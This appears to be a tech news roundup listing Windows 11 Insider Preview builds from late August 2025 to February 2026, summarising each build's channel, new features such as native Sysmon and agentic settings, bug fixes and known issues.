For those who have turned the toggle on to receive the latest updates, this build offers a variety of new features, including one in which Windows Hello Enhanced Sign-in Security (ESS) supports peripheral fingerprint sensors. Previously, ESS was only available on PCs with built-in biometric sensors, but now it can be used when you plug in a supported ESS fingerprint reader.

(Get more info about Windows 11 Insider Preview Build 28020.1619.)

Optional Windows 11 Insider Preview Build 29531.1000

Release date: February 18, 2026

Released to: Canary Channel

This build is the first in a new Canary Channel optional path with a focus on platform development, which will introduce new features before the existing 28000 Canary Channel series. Microsoft recommends that most people remain on the 28000 build path, but adds that those who want to get the newest platform changes as early as possible may want to switch to this new 29500 path. Note, though, that if you switch to the 29500 path by installing this build, you won’t be able to go back to the 28000 Canary Channel series.

The build itself, in Microsoft’s words, “includes platform changes in moving to a new active development build.”

Microsoft warns, “because of the focus on platform development for this path, you may notice a temporary loss in some features that you have today. These features will return to this new active development build.”

(Get more info about Windows 11 Insider Preview Build 29531.1000.)

Windows 11 Insider Preview Build 26220.7859

Release date: February 17, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build displays an option to upgrade to a different Microsoft 365 plan on the Accounts page within the Settings app. It also rolls out fixes for several bugs, including one in which all File Explorer open windows and tabs unexpectedly jumped to Desktop or Home.

(Get more info about Windows 11 Preview Build 26220.7859.)

Windows 11 Insider Preview Builds 26100.7918 and 26200.7918

Release date: February 17, 2026

Released to: Release Preview Channel

This build gradually rolls out a variety of new features, including one in which Quick Machine Recovery (QMR) now turns on automatically for Windows Professional devices that are not domain‑joined and not enrolled in enterprise endpoint management. These devices receive the same recovery features available to Windows Home users. For domain‑joined or enterprise managed devices, QMR stays off unless it is enabled by the organization. The build also improves login screen reliability.

(Get more info about Windows 11 Insider Preview Builds 26100.7918 and 26200.7918.)

Windows 11 Insider Preview Build 28020.1611

Release date: February 12, 2026

Released to: Canary Channel

This build brings Sysmon functionality natively to Windows. Sysmon functionality allows you to capture system events that can help with threat detection, and you can use custom configuration files to filter the events you want to monitor. The captured events are written on the Windows event log, enabling them to be used with security applications and in a wide range of use cases.

(Get more info about Windows 11 Insider Preview Build 28020.1611.)

Windows 11 Insider Preview Build 26220.7755

Release date: February 9, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including Emoji 16.0, which contains a new set of emojis, and the ability to directly control pan and tilt for supported cameras in the Settings app.

(Get more info about Windows 11 Insider Preview Build 226220.7755.)

Windows 11 Insider Preview Build 26300.7760

Release date: February 9, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including Emoji 16.0, which contains a new set of emojis, and the ability to directly control pan and tilt for supported cameras in the Settings app.

(Get more info about Windows 11 Insider Preview Build 26300.7760.)

Windows 11 Insider Preview Build 28020.1546

Release date: February 4, 2026

Released to: Canary Channel

This update, in the words of Microsoft, “includes a small set of general improvements and fixes that improve the overall experience for Insiders” running Windows.

It also fixes one bug that affected apps working with files stored on OneDrive or Dropbox.

(Get more info about Windows 11 Insider Preview Build 28020.1546.)

Windows 11 Insider Preview Build 26220.7752

Release date: February 3, 2026

Released to: Beta Channel

Those who have turned the toggle on to receive the latest updates get Sysmon functionality natively in Windows. Sysmon functionality allows you to capture system events that can help with threat detection, and you can use custom configuration files to filter the events you want to monitor. The captured events are written on the Windows event log, enabling them to be used with security applications and a wide range of use cases. (This feature is being gradually rolled out.)

The same group also gets a number of bug fixes being gradually rolled out, including for a File Explorer bug in which icons/tooltips for “Add to favorites” were missing.

(Get more info about Insider Preview Build 26220.7752.)

Windows 11 Insider Preview Build 26300.7733

Release date: February 3, 2026

Released to: Dev Channel

Those who have turned the toggle on to receive the latest updates get Sysmon functionality natively in Windows. Sysmon functionality allows you to capture system events that can help with threat detection, and you can use custom configuration files to filter the events you want to monitor. The captured events are written on the Windows event log, enabling them to be used with security applications and a wide range of use cases. (This feature is being gradually rolled out.)

The same group also gets a number of bug fixes being gradually rolled out, including for a File Explorer bug in which icons/tooltips for “Add to favorites” were missing.

(Get more info about Insider Preview Build 26300.7733.)

Windows 11 Insider Preview Build 28020.1495

Release date: January 28, 2025

Released to: Canary Channel

This build, in Microsoft’s words, “includes a small set of general improvements and fixes that improve the overall experience [of Windows 11].” It also fixes a variety of bugs, including one that led to the Windows Update settings page hanging when loading.

The build has two known issues, one that sometimes causes all open File Explorer windows and tabs to unexpectedly jump to Desktop or Home in File Explorer, and another in which the desktop watermark is showing the wrong build number.

(Get more info about Insider Preview Build 28020.1495.)

Windows 11 Insider Preview Builds 26100.7701 and 26200.7701

Release date: January 27, 2026

Released to: Release Preview Channel

This build gradually rolls out a variety of new features for Copilot+ PCs, including one in which Narrator gives you more control over how it announces on‑screen controls. You can choose which details are spoken and adjust their order to match how you navigate apps. These settings apply throughout the app to help reduce extra speech and make Narrator easier to follow.

The build also immediately rolls out a variety of new features for all PCs, including one in Data Protection Application Programming Interface (DPAPI) domain backup key management. Administrators can now set how often keys rotate automatically. This strengthens cryptographic security and reduces reliance on older encryption algorithms.

(Get more info about Insider Preview Builds 26100.7701 and 26200.7701.)

Windows 11 Insider Preview Build 26220.7670

Release date: January 27, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several bug fixes, including for an issue in which the Search process was showing an icon with an X instead of a magnifying glass.

The build has five known issues, including one in which some Insiders’ apps aren’t showing in the system tray when they should be.

(Get more info about Insider Preview Build 26220.7670.)

Windows 11 Insider Preview Build 26300.7674

Release date: January 27, 2026

Released to: Dev Channel

In this build, the Dev Channel jumps ahead to receive 26300 series builds. This means that the window to switch from the Dev Channel to the Beta Channel is closed once Build 26300.7674is installed on your PC. This build for the Dev Channel is identical to the Windows 11 Build 26220.7653 release (see below).

(Get more info about Insider Preview Build 26300.7674.)

Windows 11 Insider Preview Build 26220.7653

Release date: January 21, 2026

Released to: Dev Channel

This build for the Dev Channel is identical to the January 16th Windows 11 Insider Preview Build 26220.7653 released to the Beta Channel. See the writeup below for details.

(Get more info about Windows 11 Insider Preview Build 26220.7653.)

Windows 11 Insider Preview Build 26220.7653

Release date: January 16, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several changes, including one in which you can now set .webp images for your desktop background in Settings > Personalization > Desktop Background.

The same group also gets a number of bug fixes being gradually rolled out, including for a bug in which Settings crashed when interacting with audio devices.

The build has four known issues, including one in which some Insiders’ apps aren’t showing in the system tray when they should be.

(Get more info about Windows 11 Insider Preview Build 26220.7653.)

Windows 11 Insider Preview Build 28020.1371 

Release date: January 14, 2026

Released to: Canary Channel

This build gradually rolls out a variety of bug fixes for those who have turned the toggle on to receive the latest updates, including a bug in which File Explorer showed a white flash when navigating between pages.

There is one known issue in this build: The desktop watermark shows the wrong build number.

(Get more info about Windows 11 Insider Preview Build 28020.1371.)

Windows 11 Insider Preview Build 26220.7535

Release date: January 9, 2026

Released to: Dev & Beta Channels

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out Copilot-powered image descriptions to Narrator on Copilot+ PCs, making it possible for blind and low-vision users to hear detailed, AI-generated descriptions of images, charts, and graphs.

The same group also gets a number of bug fixes being gradually rolled out, including for an issue in which File Explorer was causing explorer.exe to crash for some Insiders when invoking the context menu on the desktop.

The build has seven known issues, including one in which Settings crashes when interacting with audio devices.

(Get more info about Windows 11 Insider Preview Build 26220.7535.)

Windows 11 Insider Preview Build 26220.7523

Release date: December 19, 2025

Released to: Dev & Beta Channels

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out a version of Copilot on the taskbar tailored for commercial customers. It uses Work IQ as contextual information that they can reference in their Copilot chats and with Microsoft 365 AI agents. In addition, the build introduces Agent Launchers, a new framework that enables Windows apps to register AI agents and make them discoverable across the system.

The same group also gets a number of bug fixes being gradually rolled out, including one that addresses an issue in which File Explorer showed a white flash when navigating between pages.

The build has nine known issues, including one in which opening the context menu is causing explorer.exe to crash for some Insiders.

(Get more info about Windows 11 Insider Preview Build 26220.7523.)

Windows 11 Insider Preview Build 28020.1362

Release date: December 15, 2025

Released to: Canary Channel

This build gradually rolls out several new features for Copilot+ PCs, including a streamlined design for the Click to Do context menu that makes frequently used actions like Copy, Save, Share, and Open easier to access. It also rolls out new features for all PCs, including improvements to the dark mode experience in File Explorer.

A variety of bug fixes are being gradually rolled out, including one for an issue in which Settings became unresponsive when attempting to navigate to the Network & Internet section.

(Get more info about Windows 11 Insider Preview Build 28020.1362.)

Windows 11 Insider Preview Build 28000.1340 

Release date: December 9, 2025

Released to: Canary Channel

This build has, in Microsoft’s words, a “small set of general improvements and fixes” that improve Windows. It also enables more of the new features and improvements originally released with the October non-security preview update for Windows 11.

In addition, the build fixes a bug that caused some Storage Spaces to become inaccessible or Storage Spaces Direct to fail when creating a storage cluster.

(Get more info about Windows 11 Insider Preview Build 28000.1340.)

Windows 11 Insider Preview Build 26220.7344

Release date: December 5, 2025

Released to: Dev & Beta Channels

For those who have turned the toggle on to receive the latest updates, this build offers native support for the Model Context Protocol (MCP), an open standard that gives AI agents a universal way to connect with apps, tools, and services. Agents can discover and connect to these tools and other agents via a secure, manageable Windows on-device registry (ODR). By default, all agent connectors in the Windows ODR will be contained in a secure environment with their own identity and audit trail.

In addition, Quick machine recovery (QMR) will now be turned on automatically for Windows Professional devices that are not domain joined. These devices will get the same recovery features as Windows Home users. For enterprise computers that are domain joined, nothing changes — QMR will stay off unless your organization turns it on.

Those who have turned the toggle on to receive the latest updates also get a number of bug fixes, including addressing a bug in which the search window to unexpectedly started floating above the taskbar.

The build has seven known issues, including one in which File Explorer shows a white flash when navigating between pages.

(Get more info about Windows 11 Insider Preview Build 26220.7344.)

Windows 11 Insider Preview Build 26220.7271

Release date: November 21, 2025

Released to:  Dev & Beta Channels

This build introduces several features being rolled out gradually for those who have turned the toggle on to receive the latest updates. These include point-in-time restore for Windows, which lets you to quickly roll your device back to a previous state to minimize downtime and simplify troubleshooting, and (on NPU devices) fluid dictation in voice typing, which automatically corrects grammar, punctuation, and filler words as you speak.

The build also expands the availability of the Xbox full-screen experience to additional Windows 11 PCs. You can add a controller to your PC for task switching and streamlined gaming on your desktop, laptop, or tablet.

Those who have turned the toggle on to receive the latest updates also get several bug fixes, including one that resolves a hung taskbar after receiving certain notifications.

The build has seven known issues, including one in which File Explorer shows a white flash when navigating between pages.

(Get more info about Windows 11 Insider Preview Build 26220.7271.)

Windows 11 Insider Preview Build 28000.1199

Release date: November 18, 2025

Released to: Canary Channel

This build has, in Microsoft’s words, a “small set of general improvements and fixes” that improve Windows.

(Get more info about Windows 11 Insider Preview Build 28000.1199.)

Windows 11 Insider Preview Builds 26100.7296 and 26200.7296

Release date: November 17, 2025

Released to: Release Preview Channel

This update introduces a wide range of features being rolled out gradually, including several for Copilot+ PCs, such as Windows Studio Effects, which provide AI-powered camera enhancements on an additional, alternative camera such as a USB webcam or your laptop’s built-in rear camera.

All Windows 11 PCs get a variety of new features being gradually rolled out, including Windows Hello Enhanced Sign-in Security (ESS), now supporting peripheral fingerprint sensors. Also, on PCs with the settings “quick machine recovery” and “automatically check for solutions” both enabled, Quick Machine Recovery now runs a one‑time scan by default instead of repeating scans in a loop. If a fix isn’t available right away, QMR will quickly point you to the most appropriate recovery options to get you back up and running.

A bug fix is being immediately rolled out to all PCs to address an issue that affects Local Security Authority Subsystem Service (LSASS), when LSASS could become unstable due to an access violation.

(Get more info about Windows 11 Insider Preview Builds 26100.7296 and 26200.7296.)

Windows 11 Insider Preview Build 26220.7262

Release date: November 17, 2025

Released to: Beta and Dev Channels

In this build, those who have turned the toggle on to receive the latest updates get a variety of features being gradually rolled out, including using high-definition voices for English (US) in Narrator and Magnifier that use generative AI to adjust tone and pacing for more natural, expressive speech. Also rolling out is a new “Experimental agentic features” toggle in the Settings app that enables the creation of AI agent accounts and an agent workspace, and grants agentic apps access to your Documents, Downloads, Desktop, Music, Pictures, and Videos folders. (Find out more about experimental agentic features.)

The same group also gets a variety of bug fixes rolled out gradually, including for a bug in which the Task Manager process wasn’t stopping correctly after Task Manager was closed. As a result, Task Manager might have been unexpectedly open on boot.

There are four known issues in this build, including one in which the scrollbar and footer are missing in File Explorer and when text is scaled in the dark mode version of the copy dialog.

(Get more info about Windows 11 Insider Preview Build 26220.7262.)

Windows 11 Insider Preview Build 26220.7070

Release date: November 7, 2025

Released to: Beta and Dev Channels

In this build, those who have turned the toggle on to receive the latest updates get a variety of features being gradually rolled out, including the ability to choose your default dashboard in an updated Widget Board Settings.

Everyone gets an updated Quick Machine Recovery in Windows, which makes it easier and quicker to get back to a working PC. The experience in both Windows Settings and the Windows Recovery Environment (WinRE) has been streamlined.

A variety of bug fixes are being rolled out gradually to those who have opted to receive the latest updates, including one that fixes a bug in which the “Automatically hide the taskbar” setting unexpectedly turned off after displaying a message saying, “a toolbar is already hidden on this side of your screen.”

There are five known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the dark mode version of the copy dialog.

(Get more info about Windows 11 Insider Preview Build 26220.7070.)

Windows 11 Insider Preview Build 28000

Release date: November 7, 2025

Released to: Canary Channel

This build has, in Microsoft’s words, a “small set of general improvements and fixes.” There are also a variety of bug fixes, including for a bug in which the credentials window was not accessible when trying to log in to Outlook.

There are two known issues in this build, one in which sleep and shutdown aren’t working correctly for some Insiders, and the other in which the new Start menu unexpectedly scrolls to the top.

(Get more info about Windows 11 Insider Preview Build 28000.)

Windows 11 Insider Preview Build 27982

Release date: November 4, 2025

Released to: Canary Channel

This build gradually rolls out several new features, including one in which you can add, remove, and rearrange lock screen widgets such as Weather, Watchlist, and Sports on the lock screen. Windows also provides suggested widgets on the lock screen. To customize your lock screen widgets, go to Settings > Personalization > Lock screen.

Also new is a “drag tray” that appears at the top of your screen when you drag a local file from File Explorer or your desktop. You can drop the file into one of the displayed apps or select More to open the Windows share window.

A variety of bugs have been fixed, including one in which if you used your PC for a while without rebooting, explorer.exe might start crashing repeatedly.

There are two known issues in this build, one in which sleep and shutdown aren’t working correctly for some Insiders, and the other in which the new Start menu unexpectedly scrolls to the top.

(Get more info about Windows 11 Insider Preview Build 27982.)

Windows 11 Insider Preview Build 26220.7051

Release date: October 31, 2025

Released to: Beta and Dev Channels

In this build, those have turned the toggle on to receive the latest updates get a variety of features being gradually rolled out, including Ask Copilot in the taskbar, which gives  you one-click access to Copilot Vision and Voice, so you can search via Copilot using text, voice, or guided support with Copilot Vision. As you type, results appear and update instantly. Turn it on by going to Settings > Personalization > Taskbar > Ask Copilot.  You can also manage whether the Copilot app launches automatically at sign-in using the “Auto start on log in” toggle in the Copilot app settings.

The same group gets a variety of bug fixes being rolled out gradually, including one to address an issue in which  interacting with a folder or its contents in Start menu could result in the folder becoming invisible.

There are four known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the dark mode version of the copy dialog.

(Get more info about Windows 11 Insider Preview Build 26220.7051.)

Windows 11 Insider Preview Build 26220.6982

Release date: October 24, 2025

Released to: Dev Channel

In this build, those have turned the toggle on to receive the latest updates get a variety of changes being gradually rolled out, including Copy & Search, which allows you to search the text in your clipboard with a single click. When you copy text anywhere in Windows, a paste gleam will appear in your search box. Click on this gleam and your copied text will appear in the search field, allowing you to search instantly.

The same group gets a variety of bug fixes, including one for a bug in which the search icon in File Explorer sometimes infinitely looped in an animation.

There are five known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in dark mode version of the copy dialog.

(Get more info about Windows 11 Insider Preview Build 26220.6982.)

Windows 11 Insider Preview Build 27975 

Release date: October 23, 2025

Released to: Canary Channel

This build has, in Microsoft’s words, a “small set of general improvements and fixes” that improve Windows.

A variety of bugs have also been fixed, including one in which Settings crashed when accessing drive information under Settings > System > Storage. This also impacted accessing the drive information from the properties when you right-clicked a drive in File Explorer.

There are two known issues in this build, one in which sleep and shutdown aren’t working correctly for some Insiders, and the other in which the new Start menu unexpectedly scrolled to the top.

(Get more info about Windows 11 Insider Preview Build 27975.)

Windows 11 Builds 26100.7015 and 26200.7015

Release date: October 21, 2025

Released to: Release Preview Channel

This update includes a wide variety of new features being rolled out gradually, including a redesigned Start menu that includes a scrollable All section, has new category and grid views, and which adapts to your screen size. The build also includes new features for Click to Do, which can now translate text into other languages. File Explorer now has a recommended files feature that shows content such as files you frequently use, have recently downloaded, or have added to your File Explorer Gallery.

Two bugs are fixed in this build: one that caused an ACCESS_DENIED error when users attempted to change passwords remotely on member servers or workgroup devices, even when they had the required permissions, and another in which protected content playback failed on some machines after installing KB506408.

(Get more info about Windows 11 Insider Preview Builds 26100.7015 and 26200.7015.)

Windows 11 Insider Preview Build 26220.6972

Release date: October 17, 2025

Released to: Dev Channel

In this build, those who have turned the toggle on to receive the latest updates get a new feature being rolled out slowly, which lets you add and manage your mobile devices from Settings by navigating to “Mobile Devices” under the Bluetooth & Devices section. The page allows you to view your mobile devices, add new mobile devices, and manage features such as using your device as a connected camera or accessing your device’s files in File Explorer.

Those who have turned the toggle on to receive the latest updates get two bug fixes being rolled out slowly, one for a bug that caused File Explorer to show a Catastrophic Error (0x8000FFFF) when extracting large (1.5GB+) archive files, and another that sometimes caused an old white toolbar to randomly appear in File Explorer.

There are five known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the copy dialog in dark mode.

(Get more info about Windows 11 Insider Preview Build 26220.6972.)

Windows 11 Insider Preview Build 27971 

Release date: October 16, 2025

Released to: Canary Channel

In this build, the Notification Center can be used on secondary monitors. You’ll be able to see your calendar on any of your monitors and open Notification Center on any of them by clicking the date and time in the system tray of your taskbar. Note that this functionality will be rolled out gradually.

A variety of bugs have been fixed, including one in which File Explorer crashed when transferring files to a network drive.

There are three known issues in this build, including one in which sleep and shutdown aren’t working correctly for some Insiders.

(Get more info about Windows 11 Insider Preview Build 27971.)

Windows 11 Insider Preview Build 26120.6780 

Release date: October 10, 2025

Released to: Beta Channel

In this build, those with Copilot+ PCs who have turned the toggle on to receive the latest updates get a handful of changes and new features, including one in Settings in which more results appear in the search flyout and let you quickly modify the settings you’re searching for.

Those with any PCs who have turned the toggle on get several changes, including a new OneDrive icon in Accounts and Homepages in Settings, and the return of the ability to enable Administrator Protection via Windows Security under Account protection.

The same group gets a variety of bug fixes, including one for an issue in the previous flight in which File Explorer frequently crashed, and another that was causing the Start menu to unexpectedly scroll to the top when interacting with it.

There are four known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the copy dialog in dark mode.

(Get more info about Windows 11 Insider Preview Build 26120.6780.)

Windows 11 Insider Preview Build 26220.6780 

Release date: October 10, 2025

Released to: Dev Channel

This update is identical to Build 26120.6780 for the Beta Channel, detailed above.

(Get more info about Windows 11 Insider Preview Build 26220.6780.)

Windows 11 Insider Preview Build 27965

Release date: October 8, 2025

Released to: Canary Channel

This update introduces a new scrollable Start menu, with “All” on the top level, so apps are accessible without having to navigate to a secondary page. There are also new category and grid views to browse and launch your installed apps in the “All” section. The new menu adapts its size based on your device’s screen size.

There are also several bug fixes, including one in which the taskbar was not autohiding correctly.

There are four known issues in this build, including one in which Settings may crash when accessing drive information under Settings > System > Storage. This also impacts accessing the drive information from the properties when you right-click a drive in File Explorer.

(Get more info about Windows 11 Insider Preview Build 27965.)

Windows 11 Insider Preview Build 27959

Release date: October 6, 2025

Released to: Canary Channel

This update introduces the option to move the hardware indicators for brightness, volume, airplane mode, and virtual desktops to different positions on your screen, including the current bottom position and new top-left and top-center positions.

There are also a variety of bug fixes, including for one in which icons and text sometimes overlapped on the desktop when using increased text scaling.

There is one known issue in this build, in which sleep and shutdown aren’t working correctly for some Insiders.

(Get more info about Windows 11 Insider Preview Build 27959.)

Windows 11 Insider Preview Build 26120.6772

Release date: October 6, 2025

Released to: Beta Channel

In this build, those who have turned the toggle on to receive the latest updates get a variety of new features, including Image Object select for Click to Do in Copilot+ PCs, in which you can   hover over your image to preview selectable areas. Once selected, you can copy and paste your object into other apps or use it to kick off a chat with Copilot. Also included are improvements to dark mode for File Explorer for all PCs and the ability to use peripheral fingerprint sensors with Windows Hello. These changes are rolling out gradually.

The same group gets a variety of bugs fixed, including one in which Encrypted File System (EFS) related dialogs in File Explorer weren’t responding to increased text scaling. The bug fixes are rolling out gradually.

There are five known issues in this build, including one in which some searches may show unexpected text instead of the expected results and images.

(Get more info about Windows 11 Insider Preview Build 26120.6772.)

Windows 11 Insider Preview Build 26120.6772 

Release date: October 6, 2025

Released to: Dev Channel

This update is identical to Build 26120.6772, detailed above.

(Get more info about Windows 11 Insider Preview Build 26120.6772.)

Windows 11 Insider Preview Build 26120.6760

Release date: September 29, 2025

Released to: Beta Channel

In this build, those who have turned the toggle on to receive the latest updates get a variety of new features, including the ability to do a network speed test straight from the taskbar. You can launch it via the Wi-Fi and Cellular Quick Settings pages or by right-clicking the network icon in the system tray. The tool opens in your default browser and supports testing Ethernet, Wi-Fi, and cellular connections. It helps in assessing network performance and troubleshooting.

The same group gets a variety of bug fixes, including for an issue in which the battery icon got out of sync with the actual charging state — for example, it would show that you weren’t plugged in when you were.

Everyone in the Beta Channel gets a variety of bug fixes, including one for developers that addresses an issue in which PIX on Windows was unable to play back GPU captures. 

There are six known issues in this build, including one in which some searches may show unexpected text instead of the expected results and images.

(Get more info about Windows 11 Insider Preview Build 26120.6760.)

Windows 11 Insider Preview Build 26220.6760 

Release date: September 29, 2025

Released to: Dev Channel

This build is for those who have already upgraded to Windows 11 version 25H2.

In this build, those who have turned the toggle on to receive the latest updates get a variety of new features, including the ability to do a network speed test straight from the taskbar. You can launch it via the Wi-Fi and Cellular Quick Settings pages or by right-clicking the network icon in the system tray. The tool opens in your default browser and supports testing Ethernet, Wi-Fi, and cellular connections. It helps in assessing network performance and troubleshooting.

The same group gets a variety of bug fixes, including for an issue in which the battery icon got out of sync with the actual charging state — for example, it would show that you weren’t plugged in when you were.

Everyone in the Dev Channel gets a variety of bug fixes, including one for developers that addresses an issue in which PIX on Windows was unable to play back GPU captures. 

There are six known issues in this build, including one in which some searches may show unexpected text instead of the expected results and images.

(Get more info about Windows 11 Insider Preview Build 26220.6760.)

Windows 11 Insider Preview Build 27954

Release date: September 25, 2025

Released to: Canary Channel

This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running” Windows. It also includes fixes one bug in which you might not be able to connect to shared files and folders if you were using the Server Message Block (SMB) v1 protocol on NetBIOS over TCP/IP NetBIOS (NetBT) after the latest updates.

There is one known issue in this build, in which PIX on Windows is unable to play back GPU captures on this OS version. This will be addressed by a new PIX release, estimated to arrive by the end of September. In the meantime, if you are affected, you can use the “Send Feedback” button in PIX or contact Microsoft on the DirectX Discord server and get help via private builds.

(Get more info about Windows 11 Insider Preview Build 27954.)

Windows 11 Insider Preview Build 26120.6690

Release date: September 19, 2025

Released to: Beta Channel

For those who have Copilot+ PCs and have turned on a toggle to receive the latest update, this build gradually rolls out several new features, including one in which Click to Do can let users translate on-screen text with just a few clicks. 

All PCs that have turned a toggle on to receive the latest updates get a variety of bug fixes rolled out gradually, including one in which File Explorer became unresponsive if a UNC server name was directly typed into address bar. There are 10 known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.

(Get more info about Windows 11 Insider Preview Build 26120.6690.)

Windows 11 Insider Preview Build 26220.6690

Release date: September 19, 2025

Released to: Dev Channel

This build is for those who have already upgraded to Windows 11 version 25H2. 

For those who have Copilot+ PCs and have turned on a toggle to receive the latest update, this build gradually rolls out several new features, including one in which Click to Do can let you translate on-screen text with just a few clicks. 

All PCs which have turned a toggle on to receive the latest updates get a variety of bug fixes rolled out gradually, including one in which File Explorer became unresponsive if a UNC server name was directly typed into address bar. There are 10 known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.

(Get more info about Windows 11 Insider Preview Build 26220.6690.)

Windows 11 Insider Preview Build 27950

Release date: September 19, 2025

Released to: Canary Channel

This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running” Windows. In addition, Advanced Settings will revert to the previous “For Developers” experience after updating to this build. 

There are also a number of bug fixes, including one in which the app preview windows in the taskbar became misaligned (away from the app icon you’d clicked / hovered over) after a display resolution change. 

There are two known issues in this build, including one for developers in which PIX on Windows is unable to play back GPU captures. This will be addressed by a new PIX release, estimated to arrive by the end of September. In the meantime, anyone impacted can use the “Send Feedback” button in PIX or contact Microsoft on the DirectX Discord server and Microsoft can help provide private builds.

(Get more info about Windows 11 Insider Preview Build 27950.)

Windows 11 Insider Preview Builds 26100.6713 and 26200.6713

Release date: September 12, 2025

Released to: Release Preview Channel

Build 26100.6713 is for those on Windows 11 24H2, and 26200.6713 is for those on Windows 25H2.

These builds gradually roll out a large number of new features, including AI actions in File Explorer for editing images or summarizing documents, and the ability to pin favorite apps in the Windows share window to quickly access them when you need them.

The builds fix several bugs immediately, including one that disrupted Windows Update for those using Windows Server Update Services (WSUS). Additionally, several bug fixes are being gradually rolled out, including for a bug in which when Windows Sandbox was enabled, the VmmemCmFirstBoot process may have consumed large amounts of CPU after login, causing your PC to become unresponsive.

(Get more info about Windows 11 Insider Preview Builds 26100.6713 and 26200.6713.)

Windows 11 Insider Preview Build 26120.6682

Release date: September 12, 2025

Released to: Beta Channel

For those who have Copilot+ PCs and have turned the toggle on to receive the latest update, this build gradually rolls out a new Copilot prompt box in Click to Do designed to streamline interaction with Microsoft Copilot.

New emoji from Emoji 16.0 are being gradually rolled out in the emoji panel for those who have turned the toggle on to receive the latest updates.

The same group also gets a variety of bug fixes rolled out gradually, including for one that caused some PCs to bug check (green screen) while hibernating, and another in which the Shared section in File Explorer Home was visible even if there was no content to display.

There are seven known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.

(Get more info about Windows 11 Insider Preview Build 26120.6682.)

Windows 11 Insider Preview Build 26220.6682

Release date: September 12, 2025

Released to: Dev Channel

This build is for those who have already upgraded to Windows 11 version 25H2.

For those who have Copilot+ PCs and have turned the toggle on to receive the latest updates, this build gradually rolls out a new Copilot prompt box in Click to Do designed to streamline interaction with Microsoft Copilot. New emoji from Emoji 16.0 are also being gradually rolled out to the same group.

The same group also gets a variety of bug fixes rolled out gradually, including for one that caused some PCs to bug check (green screen) while hibernating, and another in which the Shared section in File Explorer Home was visible even if there was no content to display.

There are seven known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.

(Get more info about Windows 11 Insider Preview Build 26220.6682.)

Windows 11 Insider Preview Build 27943

Release date: September 11, 2025

Released to: Canary Channel

This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running” Windows.

There are also a number of bug fixes, including for a bug that caused Settings > System > Storage > Temporary files to get stuck when scanning files. This issue also caused the entry to clean up previous Windows Installations to not show in Storage Settings.

There are five known issues in this build, including one in which audio stops working and Device Manager shows one or more devices with a yellow exclamation mark, including “ACPI Audio Compositor” and others. Selecting Properties on these devices will show “Windows cannot load the device driver for this hardware. The driver may be corrupted or missing.”

(Get more info about Windows 11 Insider Preview Build 27943.)

Windows 11 Insider Preview Build 27938

Release date: September 8, 2025

Released to: Canary Channel

This build introduces AI actions into File Explorer. These offer new capabilities when you right-click a file, such as editing a graphic or summarizing a Word document. For now, there are four of them, all related to image files. You can perform a Bing search based on an image file, blur the background in an image, erase objects in an image, and remove the background in an image.

A number of bugs have been fixed, including one that caused Task Manager to freeze when going to the performance section, and another in which the red color used for a low space drive in This PC was unexpectedly light colored.

The build has five known issues, including one in which audio stops working and Device Manager shows one or more devices with a yellow exclamation mark.

(Get more info about Windows 11 Insider Preview Build 27938.)

Windows 11 Insider Preview Build 26120.5790 

Release date: September 5, 2025

Released to: Beta Channel

For those who have Copilot+ PCs, this build introduces fluid dictation, which makes voice-based dictation easier. It automatically corrects grammar, punctuation, and filler words as you speak, reducing the need for manual editing. In addition, being rolled out on supported Copilot+ PCs is the ability to use Studio Effect’s AI-powered camera enhancements with an additional, alternative camera — such as a USB webcam or your laptop’s built-in rear camera.

Those in the Beta Channel who have turned the toggle on to receive the latest updates get new on-hover actions in File Manager Home for faster file management.

The same group also gets a variety of bug fixes rolled out gradually, including one for a bug in which the right-click context menu in File Explorer sometimes unexpectedly switched back and forth between the normal initial view and “Show more options” with each right-click when certain apps were installed.

There are five known issues in this build, including one in which for some users, the Shared section in File Explorer Home may be visible even if there is no content to display.

(Get more info about Windows 11 Insider Preview Build 26120.5790.)

Windows 11 Insider Preview Build 26220.5790 

Release date: September 5, 2025

Released to: Dev Channel

This build appears to be identical to Build 26120.5790 for the Beta Channel, detailed above.

(Get more info about Windows 11 Insider Preview Build 26220.5790.)

Windows 11 version 25H2

Release date: August 29, 2025

Released to: Release Preview Channel

This is an early preview of next major Windows 11 release, version 25H2. Among its improvements is allowing IT admins to remove select pre-installed Microsoft Store apps via Group Policy/MDM CSP on Enterprise/EDU devices. Version 25H2 also removes PowerShell 2.0 and Windows Management Instrumentation command-line (WMIC) from Windows 11. 

Commercial customers enrolled in the Windows Insider Program for Business can use the release to begin validating Windows 11 25H2 on PCs in their organizations. For these customers, Windows 11 25H2 is available through Windows Update for Business (WUfB) and Windows Server Update Service (WSUS).  You can get more information about deploying prerelease feature updates using these deployment methods. 

Get more info about Windows 11 version 25H2.

Windows 11 Insider Preview Build 26120.5770

Release date: August 29, 2025

Released to: Beta Channel

For those who have Copilot+ PCs, this build introduces a new text action in Click to Do that lets you highlight any simple table from a source and immediately send it to Excel, copy, or share it, without retyping a single cell. You can do this from any document with an embedded table, such as a school calendar from a photo, a table shared over Teams in a meeting, and others.

Those in the Beta Channel who have turned the toggle on to receive the latest updates get several new features and improvements, including one in Narrator called Braille viewer that allows you to see on-screen textual and Braille representation of the output shown on a refreshable Braille display.

The same group also gets a variety of bug fixes rolled out gradually, including for a bug that caused explorer.exe to crash when using Alt + Tab for some Insiders.

